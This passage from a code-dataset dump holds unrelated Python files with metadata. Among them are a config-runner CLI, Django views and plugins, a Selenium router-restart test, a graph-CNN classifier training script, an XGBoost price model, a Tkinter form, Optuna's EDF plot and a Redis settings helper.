self.generate_from_latent(ls)\n","sub_path":"backend/encoder/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":5057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"597741349","text":"\nimport click\n\ntry:\n from pathlib import Path\nexcept ImportError:\n from pathlib2 import Path\n\n\n@click.command()\n@click.argument('script_filepath', type=click.Path(exists=True, file_okay=True, dir_okay=False))\n@click.argument('config_filepath', type=click.Path(exists=True, file_okay=True, dir_okay=False))\n@click.option('--manual_config_load', is_flag=True, help=\"Allow manual configuration file loading\")\n@click.option('--local_rank', type=int, default=0, help=\"Local process rank for distributed computations\")\ndef command(script_filepath, config_filepath, manual_config_load, local_rank):\n \"\"\"Method to run experiment (defined by a script file)\n\n Args:\n script_filepath (str): input script filepath\n config_filepath (str): input configuration filepath\n manual_config_load (bool): if True configuration file can be manually loaded using\n `py_config_runner.runner.setup_config` method.\n local_rank (int): local process rank for distributed computations.\n See https://pytorch.org/docs/stable/distributed.html#launch-utility\n \"\"\"\n\n # remove path to py_config_runner.py_config_runner module from sys.path\n # as it can interfere with user's modules: py_config_runner.utils (seen as utils) <--> utils.py (user's module)\n this_folder_path = Path(__file__).parent.as_posix()\n import sys\n if this_folder_path in sys.path:\n sys.path.remove(this_folder_path)\n\n from py_config_runner.runner import run_script\n\n run_script(script_filepath, config_filepath, manual_config_load=manual_config_load, local_rank=local_rank)\n\n\ndef print_script_filepath():\n # This is helpful to call the runner using other executables\n # Ex1. python -m launcher `py_config_runner_script` script.py config.py\n # Ex2. 
python -m torch.distributed.launch `py_config_runner_script` script.py config.py\n print(__file__)\n\n\nif __name__ == \"__main__\":\n command()\n","sub_path":"py_config_runner/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"59296509","text":"from django.core.exceptions import ObjectDoesNotExist\n\nfrom contractor.lib.config import getConfig\n\n\nclass ConfigPlugin( object ): # this is purley Read Only, if wiring is needed have to set it to the structure/foundation's config_values, and figure out a way to reload\n TSCRIPT_NAME = 'config'\n\n def __init__( self, target ):\n super().__init__()\n if isinstance( target, dict ):\n self.config = target\n else:\n self.config = getConfig( target )\n\n def getValues( self ):\n result = {}\n for key in self.config:\n result[ key ] = ( lambda key=key: self.config[ key ], None )\n\n return result\n\n def getFunctions( self ):\n result = {}\n\n return result\n\n def __reduce__( self ):\n return ( self.__class__, ( self.config, ) )\n\n\nclass FoundationPlugin( object ):\n TSCRIPT_NAME = 'foundation'\n\n def __init__( self, foundation ): # most of the time all that is needed is the locator, so we are going to cache that and only go get the object if other than locator is needed\n super().__init__()\n self._dirty_list = []\n if isinstance( foundation, tuple ):\n self._foundation = None\n self.foundation_class = foundation[0]\n self.foundation_pk = foundation[1]\n self.foundation_locator = foundation[2]\n\n else:\n self._foundation = foundation.subclass\n self.foundation_class = self._foundation.__class__\n self.foundation_pk = foundation.pk\n self.foundation_locator = foundation.locator\n\n self.value_map = self.foundation_class.getTscriptValues( True )\n self.function_map = self.foundation_class.getTscriptFunctions()\n\n @property\n def foundation( self ):\n if self._foundation is None:\n self._foundation = self.foundation_class.objects.get( pk=self.foundation_pk )\n\n return self._foundation\n\n def _setValue( self, name, val ):\n setter = self.value_map[ name ][1]\n setter( self.foundation, val )\n self._dirty_list.append( name )\n\n def getValues( self ):\n result = {}\n for key in self.value_map:\n getter = self.value_map[ key ][0]\n setter = self.value_map[ key ][1]\n if setter is not None:\n result[ key ] = ( lambda getter=getter: getter( self.foundation ), lambda val, name=key: self._setValue( name, val ) )\n else:\n result[ key ] = ( lambda getter=getter: getter( self.foundation ), None )\n\n result[ 'locator' ] = ( lambda: self.foundation_locator, None )\n\n return result\n\n def getFunctions( self ):\n result = {}\n for key in self.function_map:\n builder = self.function_map[ key ]\n result[ key ] = lambda builder=builder: builder( self.foundation )\n\n return result\n\n def __reduce__( self ):\n if self._foundation is not None and self._dirty_list:\n self._foundation.full_clean()\n self._foundation.save( update_fields=self._dirty_list )\n\n return ( self.__class__, ( ( self.foundation_class, self.foundation_pk, self.foundation_locator ), ) )\n\n\nclass ROFoundationPlugin( FoundationPlugin ):\n def __init__( self, foundation ):\n super().__init__( foundation )\n # the same as Foundation plugin, except we want read only value_map, so replace value_map with this and call it good\n self.value_map = self.foundation_class.getTscriptValues( False )\n\n\nclass StructurePlugin( object ): # ie: structure with some 
settable attributes, 'config' is structures (with the foundation merged in of course)\n TSCRIPT_NAME = 'structure'\n\n def __init__( self, structure ):\n super().__init__()\n self.structure = structure\n\n def getValues( self ):\n result = {}\n\n try:\n provisioning_interface = self.structure.foundation.interfaces.get( is_provisioning=True )\n except ObjectDoesNotExist:\n provisioning_interface = None\n\n try:\n provisioning_ip = self.structure.address_set.get( interface_name=provisioning_interface.name, sub_interface=None ) if provisioning_interface is not None else None\n except ObjectDoesNotExist:\n provisioning_ip = None\n\n result[ 'id' ] = ( lambda: self.structure.pk, None )\n result[ 'hostname' ] = ( lambda: self.structure.hostname, None )\n result[ 'provisioning_ip' ] = ( lambda: provisioning_ip.ip_address if provisioning_ip is not None else None, None )\n result[ 'provisioning_interface' ] = ( lambda: provisioning_interface if provisioning_interface is not None else None, None )\n\n return result\n\n def getFunctions( self ):\n result = {}\n\n return result\n\n\nclass ROStructurePlugin( StructurePlugin ): # curently Structure is RO, this is so we don't have to figure out what should be RO later\n def __init__( self, structure ):\n super().__init__( structure )\n","sub_path":"contractor/Foreman/runner_plugins/building.py","file_name":"building.py","file_ext":"py","file_size_in_byte":4622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"600060242","text":"#coding:utf-8\nfrom selenium import webdriver\nimport unittest\nfrom Page import lecooRestart,lecooLogin\nimport time\n\nclass lecooRestartPage(unittest.TestCase):\n def setUp(self):\n self.driver=webdriver.Chrome()\n self.driver.maximize_window()\n self.driver.get('http://192.168.99.1')\n self.driver.implicitly_wait(30)\n\n\n def test_restart(self):\n lecooLogin.login(self.driver,pwd='12345678')\n lecooLogin.wait()\n lecooRestart.restart(self.driver)\n time.sleep(100)\n self.assertEqual('欢迎使用Lecoo路由',lecooRestart.restartSuccess(self.driver))\n\n\n def tearDown(self):\n self.driver.quit()\n\nif __name__=='__main__':\n unittest.main()\n\n\n","sub_path":"TestCase/test_lecooRestart.py","file_name":"test_lecooRestart.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"545131517","text":"import torch \nimport torch.nn as nn\n#import torchvision.transforms as transforms\nimport torch.utils.data as utils\nfrom torch.autograd import Variable\nimport numpy as np\nfrom utils import compute_nystrom,create_train_test_loaders,imbalance\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import KFold\nfrom model import CNN\nfrom graph_kernels import sp_kernel, wl_kernel\nimport xlwt\nimport xlrd \nfrom xlutils.copy import copy \nfrom xlwt import Style \ndef writeExcel(row, col, value, file_name,styl=Style.default_style): \n rb = xlrd.open_workbook(file_name) \n wb = copy(rb) \n ws = wb.get_sheet(0) \n ws.write(row, col, value, styl) \n wb.save(file_name) \n\ncommunity_detection = \"louvain\"\n\n# Hyper Parameters\ndim = 100\nbatch_size = 10\nnum_epochs = 150\nnum_filters = 20\nhidden_size = 20\nlearning_rate = 0.005\nuse_node_labels = False\nkernels=[wl_kernel]\nnum_kernels = len(kernels)\n\ndef test_():\n print(\"Computing feature maps...\")\n Q, subgraphs, labels,shapes = compute_nystrom(use_node_labels, dim, community_detection, kernels)\n 
M=np.zeros((shapes[0],shapes[1],len(kernels)))\n for idx,k in enumerate(kernels):\n M[:,:,idx]=Q[idx]\n Q=M\n # Binarize labels\n le = LabelEncoder()\n y = le.fit_transform(labels)\n # Build vocabulary\n max_document_length = max([len(x.split(\" \")) for x in subgraphs])\n x = np.zeros((len(subgraphs), max_document_length), dtype=np.int32)\n for i in range(len(subgraphs)):\n\t communities = subgraphs[i].split()\n\t for j in range(len(communities)):\n\t\t x[i,j] = int(communities[j])\n reg=x[0:2500]\n gen=x[2500:5000]\n mal=x[5000:] \n reg_label=y[:2500]\n gen_label=y[2500:5000]\n mal_label=y[5000:]\n \n train_reg=reg[0:1500]\n test_reg=reg[1500:]\n train_reg_y=reg_label[0:1500]\n test_reg_y=reg_label[1500:]\n \n train_mal=mal[0:1500]\n test_mal=mal[1500:]\n train_mal_y=mal_label[0:1500]\n test_mal_y=mal_label[1500:]\n \n train_gen=gen[0:1500]\n train_gen_y=gen_label[0:1500]\n \n train_fake=np.concatenate((train_reg,train_gen),axis=0)\n y_train_fake=np.concatenate((train_reg_y,train_gen_y),axis=0)\n train_real=np.concatenate((train_reg,train_mal),axis=0)\n y_train_real=np.concatenate((train_reg_y,train_mal_y),axis=0)\n test=np.concatenate((test_reg,test_mal),axis=0)\n y_test=np.concatenate((test_reg_y,test_mal_y),axis=0)\n\n \n def train_test(Q, x_train, x_test, y_train, y_test, batch_size): \n train_loader, test_loader = create_train_test_loaders(Q, x_train, x_test, y_train, y_test, batch_size)\t\t \n cnn = CNN(input_size=num_filters, hidden_size=hidden_size, num_classes=np.unique(y).size, dim=dim, num_kernels=num_kernels, max_document_length=max_document_length)\n if torch.cuda.is_available():\n cnn.cuda()\n if torch.cuda.is_available():\n criterion = nn.CrossEntropyLoss().cuda()\n else:\n criterion = nn.CrossEntropyLoss()\n optimizer = torch.optim.Adam(cnn.parameters(), lr=learning_rate)\n for epoch in range(num_epochs):\n for i, (graphs, labels) in enumerate(train_loader):\n graphs = Variable(graphs)\n labels = Variable(labels)\n optimizer.zero_grad()\n outputs = cnn(graphs)\n if torch.cuda.is_available():\n loss = criterion(outputs, labels.cuda())\n else:\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\t\t \t# Test the Model\n \n cnn.eval() \n correct = 0\n total = 0\n TP=0\n TN=0\n FP=0\n FN=0\n predict=[]\n label=[]\n output=[]\n for graphs, labels in test_loader:\n graphs = Variable(graphs)\n outputs = cnn(graphs)\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels.cuda()).sum()\n TP += (predicted+labels.cuda()==2).sum()\n FP+=(predicted*5+labels.cuda()*1==5).sum()\n FN+=(predicted*1+labels.cuda()*5==5).sum()\n TN+=(predicted+labels.cuda()==0).sum()\n predict.append(predicted)\n label.append(labels)\n output.append(outputs.data)\n if TP+FP==0: precision=0\n else: precision=TP/(TP+FP)\n if TP+FN==0: recall=0\n else: recall=TP/(TP+FN)\n l=np.zeros((len(label)))\n for i in range(len(label)):\n l[i]=int(label[i])\n s=np.zeros((len(output)))\n for i in range(len(output)):\n s[i]=output[i][0][1]\n return TP,TN,FP,FN,precision,recall,l,s\n TP_fake,TN_fake,FP_fake,FN_fake,precision_fake,recall_fake,l_fake,s_fake=train_test(Q, train_fake, test, y_train_fake, y_test, batch_size)\n TP_real,TN_real,FP_real,FN_real,precision_real,recall_real,l_real,s_real=train_test(Q, train_real, test, y_train_real, y_test, batch_size)\n return TP_fake,TN_fake,FP_fake,FN_fake,precision_fake,recall_fake,l_fake,s_fake,TP_real,TN_real,FP_real,FN_real,precision_real,recall_real,l_real,s_real\n'''\nnum=0\nlab=[]\nsc=[]\nskip=[]\nfor user 
in red_user: \n try:\n TP,TN,FP,FN,precision,recall,l,s=test_(user,red_user)\n writeExcel(int(num)+1,0, user, 'C:/Users/gxjco/Desktop/New folder (2)/result_CGN.xls')\n writeExcel(int(num)+1,1, TN, 'C:/Users/gxjco/Desktop/New folder (2)/result_CGN.xls')\n writeExcel(int(num)+1,2, TP, 'C:/Users/gxjco/Desktop/New folder (2)/result_CGN.xls')\n writeExcel(int(num)+1,3, FN, 'C:/Users/gxjco/Desktop/New folder (2)/result_CGN.xls')\n writeExcel(int(num)+1,4, FP, 'C:/Users/gxjco/Desktop/New folder (2)/result_CGN.xls')\n writeExcel(int(num)+1,5, precision, 'C:/Users/gxjco/Desktop/New folder (2)/result_CGN.xls')\n writeExcel(int(num)+1,6, recall, 'C:/Users/gxjco/Desktop/New folder (2)/result_CGN.xls')\n print(num)\n num+=1\n lab.append(l)\n sc.append(s)\n except: skip.append(user)\n \nlabel_total=lab[0]\nscore_total=sc[0]\nfor i in range(97):\n label_total=np.concatenate((label_total,lab[i+1]),axis=0)\n score_total=np.concatenate((score_total,sc[i+1]),axis=0)\n#draw ROC tota\nfrom sklearn.metrics import roc_curve, auc\nimport matplotlib.pyplot as plt\nfpr,tpr,threshold = roc_curve(label_total, score_total) \nroc_auc = auc(fpr,tpr)\nplt.figure() \nlw = 2 \nplt.figure(figsize=(10,10)) \nplt.plot(fpr, tpr, color='darkorange', \n lw=lw, label='ROC curve (area = %0.2f)' % roc_auc) \nplt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--') \nplt.xlim([0.0, 1.0]) \nplt.ylim([0.0, 1.05]) \nplt.xlabel('False Positive Rate') \nplt.ylabel('True Positive Rate') \nplt.title('ROC curve on KCNN model') \nplt.legend(loc=\"lower right\") \nplt.show() '''","sub_path":"evaluation_poisson/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"599628251","text":"# -*- coding:utf-8 -*-\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom .forms import contactForm\nfrom django.core.mail import send_mail\nfrom django.conf import settings\n#------- 함수로 구현한 contactForm 뷰\n# def contact(request):\n# form = contactForm(request.POST or None)\n#\n# if form.is_valid():\n# #print request.POST\n# #print form.cleaned_data['email']\n# name = form.cleaned_data['name']\n# comment = form.cleaned_data['comment']\n# subject = 'Message from MYSITE.com'\n# message = '%s\\n\\n from %s' %(comment, name)\n# emailFrom = form.cleaned_data['email']\n# emailTo = [settings.EMAIL_HOST_USER]\n# send_mail(subject, message, emailFrom, emailTo, fail_silently=True)\n#\n# context = locals()\n# template = 'contact/contact.html'\n# return render(request, template, context)\nfrom django.views.generic.edit import FormView\nfrom .forms import contactForm\n#------- 클래스로 구현한 contactForm 뷰\nclass ContactFormView(FormView):\n form_class = contactForm\n template_name = 'contact/contact.html'\n\n def form_valid(self,form):\n name = self.request.POST['name']\n comment = self.request.POST['comment']\n subject = 'Message from MYSITE.com'\n message = '%s\\n\\n from %s' % (comment, name)\n emailFrom = self.request.POST['email']\n emailTo = [settings.EMAIL_HOST_USER]\n\n send_mail(subject, message, emailFrom, emailTo, fail_silently=True)\n\n confirm_message = \"Thanks for the message. 
We will get right back to you.\"\n\n context = {}\n #context['form'] = form\n context['sender'] = name\n context['email'] = emailFrom\n context['confirm_message'] = confirm_message\n return render(self.request, self.template_name, context)","sub_path":"mysite/contact/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"281923291","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render\nfrom django.urls.base import reverse\nfrom 錄音.models import TsokPhin\nfrom 錄音.tasks import decoding\n\n\n@login_required(login_url='/admin/login/')\ndef lokim(request, tsokphin_id):\n tsokphin = TsokPhin.objects.get(id=tsokphin_id)\n if request.method == 'POST':\n _thuan(request.FILES['imtong'], tsokphin_id)\n return render(\n request, 'liokim/index.html',\n {\n 'tsokphin': tsokphin.作品名,\n 'kautui': '{}?作品__id__exact={}'.format(\n reverse('admin:錄音_句表_changelist'), tsokphin_id\n )\n }\n )\n\n\ndef _thuan(imtong, tsokphin_id):\n ku = TsokPhin.objects.get(id=tsokphin_id).Ku.create()\n ku.音檔.save('{}.wav'.format(ku.id), imtong)\n decoding.delay(ku.id, ku.音檔.name)\n","sub_path":"錄音/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"482357301","text":"# Lisa Westover\n# CS1400 7 week\n# Unit4/Task2- chessboard.py\n\nimport turtle\n\n# draw the main outline of the board and call drawAllRectangles to do the inside squares\ndef drawChessboard(startX, startY, width=250, height=250):\n turtle.getturtle()\n turtle.showturtle()\n turtle.penup()\n turtle.goto(startX, startY)\n turtle.pendown()\n turtle.forward(width)\n turtle.left(90)\n turtle.forward(height)\n turtle.left(90)\n turtle.forward(width)\n turtle.left(90)\n turtle.forward(height)\n\n\n\n #call drawAllRectangles to loop to the squares\n drawAllRectangles(startX, startY, width, height)\n\n# calculate and loop the location for each rectangle then shift and loop again\ndef drawAllRectangles(startX, startY, width, height):\n squareHeight = float(height / 8)\n squareWidth = float(width / 8)\n newStartX = float(startX)\n newStartY = float(startY)\n turtle.goto(startX, startY + squareHeight)\n for j in range(4):\n\n for i in range(4):\n # begin drawing squares\n\n drawRectangle(newStartX, newStartY, squareWidth, squareHeight)\n\n newStartX = newStartX + squareWidth + squareWidth\n newStartY = newStartY + squareHeight * 2\n newStartX = startX\n\n newStartX = startX + squareWidth\n newStartY = startY + squareHeight\n\n for j in range(4):\n for i in range(4):\n drawRectangle(newStartX, newStartY, squareWidth, squareHeight)\n newStartX = newStartX + squareWidth + squareWidth\n newStartY = newStartY + squareHeight * 2\n newStartX = startX + squareWidth\n\n #turtle.forward(squareWidth * 2)\n\n print(\"should be done drawing squares\")\n turtle.done\n\n# pass coordinates to create individual rectangle\ndef drawRectangle(newStartX, newStartY, squareWidth, squareHeight):\n turtle.penup()\n turtle.goto(newStartX, newStartY)\n turtle.pendown()\n turtle.begin_fill()\n turtle.color(\"black\")\n turtle.setheading(0)\n turtle.forward(squareWidth)\n turtle.setheading(90)\n turtle.forward(squareHeight)\n turtle.setheading(180)\n turtle.forward(squareWidth)\n turtle.setheading(270)\n turtle.forward(squareHeight)\n turtle.end_fill()\n turtle.left(90)\n\n\n # tell turtle to draw a square 
starting from new xy and square height and width","sub_path":"Assignments/Westover-Lisa-Unit4/chessboard.py","file_name":"chessboard.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"331289705","text":"import numpy as np\nfrom xgboost import XGBClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nimport pandas as pd\nimport statsmodels.api as sm\nimport tqdm\n\n\ndf = pd.read_csv('total_not_market.csv',encoding = 'utf-8-sig')\n\n\nl=[]\nfor i in df.values:\n l.append([i[3],i[5]])\n\n\ndf_l_1 = pd.DataFrame(l,columns=['品名','地區'])\ndf_l = df_l_1.drop_duplicates(['品名','地區'])\n\n\ntrain_test_regrassion = []\nfor name in tqdm.tqdm(df_l.values):\n try:\n coco = []\n for i in df.values:\n if i[3] == name[0] and i[5] == name[1] :\n coco.append([i[6],i[7]])\n coco_df = pd.DataFrame(coco,columns=['價格','交易量'])\n #iris_three = iris.drop('品名',axis = 1).drop('日期',axis = 1)\n price = coco_df['價格'].tolist()\n del price[0]\n price.append(14.82)\n coco_df['過去價格'] = price\n #climate = pd.read_excel('final.xlsx',encoding = 'utf-8-sig')\n #climate_four = climate.drop(\"時間\", axis = 1).drop('價格',axis = 1).drop('時間.1',axis = 1).drop('相對溼度(%)',axis = 1)\n #\n #combin = pd.concat([iris_three,climate_four],axis=1)\n coco_X =coco_df.iloc[:,1:].values\n coco_y = coco_df.iloc[:,0]\n #iris_y_pro =iris_three.iloc[:,:1].values\n #iris_y_list=[]\n #for i in iris_y_pro:\n # iris_y_list.append(i[0])\n coco_y = np.array(coco_y,dtype=int)\n #print(coco_X)\n #print(coco_y)\n X_train, X_test, y_train, y_test = train_test_split(coco_X, coco_y, test_size=0.3)\n # fit model no training data\n model = XGBClassifier()\n model.fit(X_train, y_train)\n y_result = model.predict(X_test)\n #predictions = [round(value) for value in y_result]\n #accuracy = accuracy_score(y_test, predictions)\n #print(accuracy)\n #print(\"Accuracy: %.2f%%\" % (accuracy * 100.0))\n est = sm.OLS(y_test,y_result)\n est1 = est.fit() \n print(est1.rsquared)\n except:\n print('資料量過少')\n continue\n\ntrain_test_df = pd.DataFrame(train_test_regrassion,columns=['品名','地區','判定係數'])\n\ntrain_test_df.to_csv('price_volumn_regrassion.csv',encoding = 'utf-8-sig',index = False)\n\n","sub_path":"price_predict/ML/XGB_day.py","file_name":"XGB_day.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"303156323","text":"from random import randint\n\nRAND_RANGE = (-100, 300)\nCORRECT_RANGE = (0, 256)\n\n####################################\n\nNUM_CASES = 20\n\nTEST_CASE_FORMAT = \"\"\"\ncase = Test %d\ninput = %d\noutput = \"%s\"\n\"\"\"\n\n####################################\n\n\nfor i in range(1, 1+NUM_CASES):\n\n inp = randint(*RAND_RANGE)\n\n if inp not in range(*CORRECT_RANGE):\n out = \"It is not in range\"\n else:\n binary = \"{0:08b}\".format(inp)\n out = \" \".join(binary)\n\n print(TEST_CASE_FORMAT % (i, inp, out))\n","sub_path":"fall-2017/gen-test-dec-to-bin.py","file_name":"gen-test-dec-to-bin.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"199511005","text":"import tkinter as tk\n\n\nclass AddTaskWindow(tk.Frame):\n def __init__(self, master, service, boss):\n super().__init__(master)\n self.master = master\n self.masterService = service\n self.boss = boss\n self.addButtons()\n self.addTextboxes()\n self.addLabels()\n 
self.grid(sticky='nswe')\n\n def addTextboxes(self):\n self.nameBox = tk.Entry(self.master, width=32)\n self.nameBox.grid(column=1, row=0, columnspan=4)\n\n self.dateBox = tk.Entry(self.master, width=10)\n self.dateBox.grid(column=1, row=1)\n\n self.dueBox = tk.Entry(self.master, width=10)\n self.dueBox.grid(column=3, row=1)\n\n def addLabels(self):\n self.nameLabel = tk.Label(self.master, width=10, height=1,\n text='Nombre:')\n self.nameLabel.grid(column=0, row=0)\n\n self.dateLabel = tk.Label(self.master, width=10, height=1,\n text='Inicio:')\n self.dateLabel.grid(column=0, row=1)\n\n self.dueLabel = tk.Label(self.master, width=10, height=1,\n text='Hasta:')\n self.dueLabel.grid(column=2, row=1)\n\n def addButtons(self):\n self.saveButton = tk.Button(self.master, text=\"Guardar\",\n width=18, command=self.addTask)\n self.saveButton.grid(column=0, columnspan=2, row=2)\n\n self.cancelButton = tk.Button(self.master, text=\"Cancelar\",\n command=self.master.destroy,\n width=18)\n self.cancelButton.grid(column=2, columnspan=2, row=2)\n\n def addTask(self, id=None):\n nombre = self.nameBox.get()\n date = self.dateBox.get()\n due = self.dueBox.get()\n self.data = [nombre, date, due]\n task = self.masterService.addTask(data=self.data)\n self.boss.displayTask(task.__dict__)\n self.master.destroy()\n del self\n\n\nif __name__ == \"__main__\":\n branch = tk.Tk()\n addTaskWindow = AddTaskWindow(branch)\n branch.mainloop()\n","sub_path":"addTaskWindow.py","file_name":"addTaskWindow.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"380942483","text":"# def sum(a=5, b=10):\r\n# \"\"\"\r\n# doc string\r\n# \"\"\"\r\n# return a + b, a - b, a * b\r\n\r\n# a = int(input())\r\n# b = int(input())\r\n# c, _, _ = sum(a, b)\r\n# print(c)\r\n\r\npow2 = []\r\nfor i in range(10):\r\n pow2.append(2 ** i)\r\n\r\npow2 = [2 ** x for x in range(10)]\r\n\r\nn = int(input())\r\nall_even = [x for x in range(n) if x % 2 == 0]\r\nprint(all_even)","sub_path":"!Less/!LES1.0/1.6les.py","file_name":"1.6les.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"588000164","text":"import itertools\nfrom typing import List\nfrom typing import Sequence\nfrom typing import Union\n\nimport numpy as np\n\nfrom optuna._experimental import experimental\nfrom optuna.logging import get_logger\nfrom optuna.study import Study\nfrom optuna.trial import TrialState\nfrom optuna.visualization.matplotlib._matplotlib_imports import _imports\n\n\nif _imports.is_successful():\n from optuna.visualization.matplotlib._matplotlib_imports import Axes\n from optuna.visualization.matplotlib._matplotlib_imports import plt\n\n_logger = get_logger(__name__)\n\n\n@experimental(\"2.2.0\")\ndef plot_edf(study: Union[Study, Sequence[Study]]) -> \"Axes\":\n \"\"\"Plot the objective value EDF (empirical distribution function) of a study with Matplotlib.\n\n .. 
seealso:: optuna.visualization.plot_edf\n\n Args:\n study:\n A target :class:`~optuna.study.Study` object.\n You can pass multiple studies if you want to compare those EDFs.\n\n Returns:\n A :class:`matplotlib.axes.Axes` object.\n \"\"\"\n\n _imports.check()\n\n if isinstance(study, Study):\n studies = [study]\n else:\n studies = list(study)\n\n return _get_edf_plot(studies)\n\n\ndef _get_edf_plot(studies: List[Study]) -> \"Axes\":\n\n # Set up the graph style.\n plt.style.use(\"ggplot\") # Use ggplot style sheet for similar outputs to plotly.\n _, ax = plt.subplots()\n ax.set_title(\"Empirical Distribution Function Plot\")\n ax.set_xlabel(\"Objective Value\")\n ax.set_ylabel(\"Cumulative Probability\")\n ax.set_ylim(0, 1)\n cmap = plt.get_cmap(\"tab20\") # Use tab20 colormap for multiple line plots.\n\n # Prepare data for plotting.\n if len(studies) == 0:\n _logger.warning(\"There are no studies.\")\n return ax\n\n all_trials = list(\n itertools.chain.from_iterable(\n (\n trial\n for trial in study.get_trials(deepcopy=False)\n if trial.state == TrialState.COMPLETE\n )\n for study in studies\n )\n )\n\n if len(all_trials) == 0:\n _logger.warning(\"There are no complete trials.\")\n return ax\n\n min_x_value = min(trial.value for trial in all_trials)\n max_x_value = max(trial.value for trial in all_trials)\n x_values = np.linspace(min_x_value, max_x_value, 100)\n\n # Draw multiple line plots.\n for i, study in enumerate(studies):\n values = np.asarray(\n [\n trial.value\n for trial in study.get_trials(deepcopy=False)\n if trial.state == TrialState.COMPLETE\n ]\n )\n\n y_values = np.sum(values[:, np.newaxis] <= x_values, axis=0) / values.size\n\n ax.plot(x_values, y_values, color=cmap(i), alpha=0.7, label=study.study_name)\n\n return ax\n","sub_path":"optuna/visualization/matplotlib/_edf.py","file_name":"_edf.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"546397074","text":"import os\nimport md5\nimport copy\nimport time\nimport fnmatch\nfrom yy.utils import convert_list_to_dict\nfrom yy.db.redisscripts import load_redis_script\nfrom yy.config.cache import load\nfrom proxy_objects import AbstractWrapper\nfrom functools import reduce\nfrom common.redishelpers import RHash\n\n\ndef get_session_pool():\n import settings\n return settings.REDISES[\"session\"]\n\n\ndef get_index_pool():\n import settings\n return settings.REDISES[\"index\"]\n\n\ndef get_settings_pool():\n import settings\n return settings.REDISES['settings']\n\n\ndef make_settings_key(regionID, worldID):\n return 'REGION{%s}_WORLD{%s}' % (str(regionID), str(worldID))\n\n\ndef make_region_settings_key(regionID):\n return \"REGION{%s}\" % str(regionID)\n\n\ndef parse_world(world):\n if world:\n world['ID'] = int(world['ID'])\n world['port'] = int(world['port'])\n world['online'] = int(world.get('online', 0))\n return world\n\n\ndef make_hash(o):\n if isinstance(o, (set, tuple, list)):\n return tuple([make_hash(e) for e in o])\n elif not isinstance(o, dict):\n return hash(o)\n new_o = copy.deepcopy(o)\n for k, v in new_o.items():\n new_o[k] = make_hash(v)\n return hash(tuple(frozenset(sorted(new_o.items()))))\n\n\nclass Singleton(object):\n objs = {}\n\n def __new__(cls, *args, **kwargs):\n if args or kwargs:\n hashed = make_hash((cls, args, kwargs))\n else:\n hashed = cls\n if hashed in cls.objs:\n return cls.objs[hashed]['obj']\n obj = object.__new__(cls, *args, **kwargs)\n cls.objs[hashed] = {'obj': obj, 'init': False}\n 
setattr(cls, '__init__', cls.decorate_init(cls.__init__))\n return obj\n\n @classmethod\n def decorate_init(cls, fn):\n def init_wrap(*args, **kwargs):\n if args[1:] or kwargs:\n hashed = make_hash((cls, args[1:], kwargs))\n else:\n hashed = cls\n if not cls.objs[hashed]['init']:\n fn(*args, **kwargs)\n cls.objs[hashed]['init'] = True\n return\n return init_wrap\n\n\nclass Fetcher(AbstractWrapper):\n extra = None\n\n def __init__(self, *arg_for_handle, **kwargs):\n super(Fetcher, self).__init__()\n self.extra = kwargs\n self.extra.setdefault('args_for_handle', arg_for_handle)\n\n def __getattr__(self, attr):\n if attr == '__subject__':\n try:\n super(Fetcher, self).__getattr__(attr)\n except AttributeError:\n self.fetch()\n return self.__subject__\n return super(Fetcher, self).__getattr__(attr)\n\n def fetch(self):\n r = self.handle(*self.extra['args_for_handle'], **self.extra)\n f = self.extra.get('formatter')\n if f:\n self.__subject__ = f(r)\n else:\n self.__subject__ = r\n return self.__subject__\n\n def clear(self):\n if hasattr(self, '__subject__'):\n del self.__subject__\n\n def handle(self, *args):\n raise NotImplementedError\n\n\nclass RedisFetcher(Fetcher):\n\n def handle(self, *args, **kwargs):\n pool = kwargs.get(\"pool\", None)\n if not pool:\n pool = get_settings_pool()\n with pool.ctx() as conn:\n return conn.execute(*args)\n\n\nclass ClientConfig(Singleton):\n\n def __init__(self):\n self.key = 'client_config'\n self.pool = get_index_pool()\n\n def set(self, version, data):\n with self.pool.ctx() as conn:\n return conn.execute(\"HSET\", self.key, version, data)\n\n def get(self, version):\n with self.pool.ctx() as conn:\n return conn.execute(\"HGET\", self.key, version)\n\n\nclass ConfigFiles(Singleton):\n\n def __init__(self, id):\n self.id = id\n self.key = \"config_files.{}\".format(id)\n self.pool = 